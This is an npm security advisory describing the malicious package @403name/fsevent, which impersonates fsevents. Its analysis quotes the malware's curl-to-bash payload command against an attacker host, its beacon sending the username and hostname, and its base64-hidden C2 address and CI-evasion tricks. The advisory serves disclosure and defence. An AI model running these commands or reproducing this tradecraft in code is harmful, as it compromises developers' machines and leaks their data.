npm · Malicious package advisory
Malware@403name/fsevent
MAL-2026-5549
Malicious code in @403name/fsevent (npm)
Details
---
_-= Per source details. Do not edit below this line.=-_
## Source: amazon-inspector (2f86ca4502cc824c3684e8f1e08b088b974b4339829461b50d45e3fbc6f808eb)
On require(), index.js runs an IIFE that gates to macOS, skips when CI or GITHUB_ACTIONS is set, waits 30-90 seconds, and writes a one-shot marker at ~/.cache/.nyx-npm/f. It then spawns /bin/sh to (1) GET https://k7xm9q.xyz/api/clickfix-callback with URL-encoded query parameters bid, user (process.env.USER), host (os.hostname()), and the literal tag npm_fsevent — a beacon identifying the infected machine — and (2) execute `curl -sSfL https://k7xm9q.xyz/api/payload/ | /bin/bash & disown`, fetching and shell-executing attacker-controlled code with the developer's privileges. The C2 host is hidden behind atob('aHR0cHM6Ly9rN3htOXEueHl6') to evade keyword scanning. The package name @403name/fsevent and its description ("Native filesystem event watcher for Node.js — lightweight FSEvents wrapper with fallback polling") impersonate the well-known fsevents package to lure developers into installing and importing it. The combination of obfuscated C2, CI evasion, randomized delay, one-shot persistence marker, host-identifier exfiltration, and pipe-to-bash remote execution is unambiguous malicious tradecraft.
Compromised versions (2)
- 1.0.1
- 1.0.0
Any computer that installed or ran a compromised version should be considered fully compromised. Rotate every secret on that machine from a clean environment.